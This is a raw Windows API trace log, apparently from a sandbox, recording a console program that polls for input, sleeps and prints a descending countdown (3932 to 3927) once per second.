[0152.780] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0152.780] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff4
[0152.780] Sleep (dwMilliseconds=0x64)
[0152.889] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0152.889] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff4
[0152.889] Sleep (dwMilliseconds=0x64)
[0152.998] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0152.998] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff4
[0152.998] Sleep (dwMilliseconds=0x64)
[0153.107] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0153.108] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff4
[0153.108] Sleep (dwMilliseconds=0x64)
[0153.217] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0153.217] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff4
[0153.217] Sleep (dwMilliseconds=0x64)
[0153.326] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0153.326] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff5
[0153.326] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083932") returned 8
[0153.326] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0153.326] __iob_func () returned 0x757a2900
[0153.326] _fileno (_File=0x757a2920) returned 1
[0153.326] _errno () returned 0x5507d8
[0153.326] _get_osfhandle (_FileHandle=1) returned 0x4c
[0153.326] _errno () returned 0x5507d8
[0153.326] GetFileType (hFile=0x4c) returned 0x2
[0153.326] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0153.326] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0153.326] lstrlenW (lpString="\x08\x08\x08\x083932") returned 8
[0153.326] GetConsoleOutputCP () returned 0x1b5
[0153.327] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083932", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0153.327] GetConsoleOutputCP () returned 0x1b5
[0153.327] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083932", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083932", lpUsedDefaultChar=0x0) returned 8
[0153.327] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0153.327] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0153.327] Sleep (dwMilliseconds=0x64)
[0153.435] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0153.436] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff5
[0153.436] Sleep (dwMilliseconds=0x64)
[0153.544] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0153.544] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff5
[0153.544] Sleep (dwMilliseconds=0x64)
[0153.653] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0153.654] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff5
[0153.654] Sleep (dwMilliseconds=0x64)
[0153.763] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0153.763] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff5
[0153.763] Sleep (dwMilliseconds=0x64)
[0153.872] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0153.872] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff5
[0153.872] Sleep (dwMilliseconds=0x64)
[0153.990] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0153.990] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff5
[0153.990] Sleep (dwMilliseconds=0x64)
[0154.099] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0154.099] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff5
[0154.099] Sleep (dwMilliseconds=0x64)
[0154.199] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0154.200] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff5
[0154.200] Sleep (dwMilliseconds=0x64)
[0154.309] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0154.309] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff6
[0154.309] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083931") returned 8
[0154.309] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0154.309] __iob_func () returned 0x757a2900
[0154.309] _fileno (_File=0x757a2920) returned 1
[0154.309] _errno () returned 0x5507d8
[0154.309] _get_osfhandle (_FileHandle=1) returned 0x4c
[0154.309] _errno () returned 0x5507d8
[0154.309] GetFileType (hFile=0x4c) returned 0x2
[0154.309] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0154.309] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0154.309] lstrlenW (lpString="\x08\x08\x08\x083931") returned 8
[0154.309] GetConsoleOutputCP () returned 0x1b5
[0154.310] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083931", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0154.310] GetConsoleOutputCP () returned 0x1b5
[0154.310] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083931", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083931", lpUsedDefaultChar=0x0) returned 8
[0154.310] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0154.310] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0154.310] Sleep (dwMilliseconds=0x64)
[0154.418] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0154.418] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff6
[0154.418] Sleep (dwMilliseconds=0x64)
[0154.527] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0154.527] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff6
[0154.527] Sleep (dwMilliseconds=0x64)
[0154.636] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0154.637] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff6
[0154.637] Sleep (dwMilliseconds=0x64)
[0154.745] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0154.746] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff6
[0154.746] Sleep (dwMilliseconds=0x64)
[0154.855] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0154.855] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff6
[0154.855] Sleep (dwMilliseconds=0x64)
[0154.964] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0154.964] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff6
[0154.964] Sleep (dwMilliseconds=0x64)
[0155.073] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0155.073] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff6
[0155.073] Sleep (dwMilliseconds=0x64)
[0155.182] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0155.183] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff6
[0155.183] Sleep (dwMilliseconds=0x64)
[0155.291] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0155.292] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff7
[0155.292] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083930") returned 8
[0155.292] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0155.292] __iob_func () returned 0x757a2900
[0155.292] _fileno (_File=0x757a2920) returned 1
[0155.292] _errno () returned 0x5507d8
[0155.292] _get_osfhandle (_FileHandle=1) returned 0x4c
[0155.292] _errno () returned 0x5507d8
[0155.292] GetFileType (hFile=0x4c) returned 0x2
[0155.292] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0155.292] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0155.292] lstrlenW (lpString="\x08\x08\x08\x083930") returned 8
[0155.292] GetConsoleOutputCP () returned 0x1b5
[0155.292] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083930", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0155.293] GetConsoleOutputCP () returned 0x1b5
[0155.293] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083930", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083930", lpUsedDefaultChar=0x0) returned 8
[0155.293] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0155.293] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0155.293] Sleep (dwMilliseconds=0x64)
[0155.401] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0155.401] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff7
[0155.401] Sleep (dwMilliseconds=0x64)
[0155.510] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0155.510] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff7
[0155.510] Sleep (dwMilliseconds=0x64)
[0155.619] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0155.619] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff7
[0155.619] Sleep (dwMilliseconds=0x64)
[0155.728] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0155.728] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff7
[0155.728] Sleep (dwMilliseconds=0x64)
[0155.837] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0155.838] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff7
[0155.838] Sleep (dwMilliseconds=0x64)
[0155.947] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0155.947] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff7
[0155.947] Sleep (dwMilliseconds=0x64)
[0156.056] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0156.056] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff7
[0156.056] Sleep (dwMilliseconds=0x64)
[0156.165] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0156.165] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff7
[0156.165] Sleep (dwMilliseconds=0x64)
[0156.274] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0156.274] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff8
[0156.275] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083929") returned 8
[0156.275] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0156.275] __iob_func () returned 0x757a2900
[0156.275] _fileno (_File=0x757a2920) returned 1
[0156.275] _errno () returned 0x5507d8
[0156.275] _get_osfhandle (_FileHandle=1) returned 0x4c
[0156.275] _errno () returned 0x5507d8
[0156.275] GetFileType (hFile=0x4c) returned 0x2
[0156.275] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0156.275] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0156.275] lstrlenW (lpString="\x08\x08\x08\x083929") returned 8
[0156.275] GetConsoleOutputCP () returned 0x1b5
[0156.275] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083929", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0156.275] GetConsoleOutputCP () returned 0x1b5
[0156.275] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083929", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083929", lpUsedDefaultChar=0x0) returned 8
[0156.275] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0156.276] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0156.276] Sleep (dwMilliseconds=0x64)
[0156.384] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0156.384] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff8
[0156.384] Sleep (dwMilliseconds=0x64)
[0156.493] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0156.493] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff8
[0156.493] Sleep (dwMilliseconds=0x64)
[0156.602] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0156.602] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff8
[0156.602] Sleep (dwMilliseconds=0x64)
[0156.711] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0156.711] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff8
[0156.711] Sleep (dwMilliseconds=0x64)
[0156.820] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0156.821] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff8
[0156.821] Sleep (dwMilliseconds=0x64)
[0156.929] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0156.930] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff8
[0156.930] Sleep (dwMilliseconds=0x64)
[0157.039] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0157.039] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff8
[0157.039] Sleep (dwMilliseconds=0x64)
[0157.148] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0157.148] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff8
[0157.148] Sleep (dwMilliseconds=0x64)
[0157.257] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0157.257] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff9
[0157.257] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083928") returned 8
[0157.257] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0157.258] __iob_func () returned 0x757a2900
[0157.258] _fileno (_File=0x757a2920) returned 1
[0157.258] _errno () returned 0x5507d8
[0157.258] _get_osfhandle (_FileHandle=1) returned 0x4c
[0157.258] _errno () returned 0x5507d8
[0157.258] GetFileType (hFile=0x4c) returned 0x2
[0157.258] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0157.258] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0157.258] lstrlenW (lpString="\x08\x08\x08\x083928") returned 8
[0157.258] GetConsoleOutputCP () returned 0x1b5
[0157.258] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083928", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0157.258] GetConsoleOutputCP () returned 0x1b5
[0157.258] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083928", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083928", lpUsedDefaultChar=0x0) returned 8
[0157.258] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0157.258] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0157.258] Sleep (dwMilliseconds=0x64)
[0157.366] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0157.366] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff9
[0157.366] Sleep (dwMilliseconds=0x64)
[0157.490] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0157.490] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff9
[0157.490] Sleep (dwMilliseconds=0x64)
[0157.616] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0157.616] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff9
[0157.616] Sleep (dwMilliseconds=0x64)
[0157.757] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0157.757] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff9
[0157.757] Sleep (dwMilliseconds=0x64)
[0157.943] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0157.944] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff9
[0157.944] Sleep (dwMilliseconds=0x64)
[0158.099] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0158.099] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ff9
[0158.099] Sleep (dwMilliseconds=0x64)
[0158.242] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0158.242] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ffa
[0158.242] _vsnwprintf (in: _Buffer=0x28fc14, _BufferCount=0xfd, _Format="%s%*lu", _ArgList=0x28f988 | out: _Buffer="\x08\x08\x08\x083927") returned 8
[0158.242] SetConsoleCursorPosition (hConsoleOutput=0x4c, dwCursorPosition=0x0) returned 0
[0158.242] __iob_func () returned 0x757a2900
[0158.242] _fileno (_File=0x757a2920) returned 1
[0158.242] _errno () returned 0x5507d8
[0158.242] _get_osfhandle (_FileHandle=1) returned 0x4c
[0158.242] _errno () returned 0x5507d8
[0158.242] GetFileType (hFile=0x4c) returned 0x2
[0158.242] GetStdHandle (nStdHandle=0xfffffff5) returned 0x4c
[0158.242] GetConsoleMode (in: hConsoleHandle=0x4c, lpMode=0x28f954 | out: lpMode=0x28f954) returned 0
[0158.242] lstrlenW (lpString="\x08\x08\x08\x083927") returned 8
[0158.242] GetConsoleOutputCP () returned 0x1b5
[0158.243] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083927", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8
[0158.243] GetConsoleOutputCP () returned 0x1b5
[0158.243] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\x08\x08\x08\x083927", cchWideChar=8, lpMultiByteStr=0x187040, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x08\x08\x08\x083927", lpUsedDefaultChar=0x0) returned 8
[0158.243] fprintf (in: _File=0x757a2920, _Format="%s" | out: _File=0x757a2920) returned 8
[0158.243] fflush (in: _File=0x757a2920 | out: _File=0x757a2920) returned 0
[0158.243] Sleep (dwMilliseconds=0x64)
[0158.427] PeekConsoleInputW (in: hConsoleInput=0x3, lpBuffer=0x28f9b8, nLength=0x2, lpNumberOfEventsRead=0x28f9fc | out: lpBuffer=0x28f9b8, lpNumberOfEventsRead=0x28f9fc) returned 1
[0158.427] time (in: timer=0x28fa14 | out: timer=0x28fa14) returned 0x5bcd5ffa
[0158.427] Sleep (dwMilliseconds=0x64)
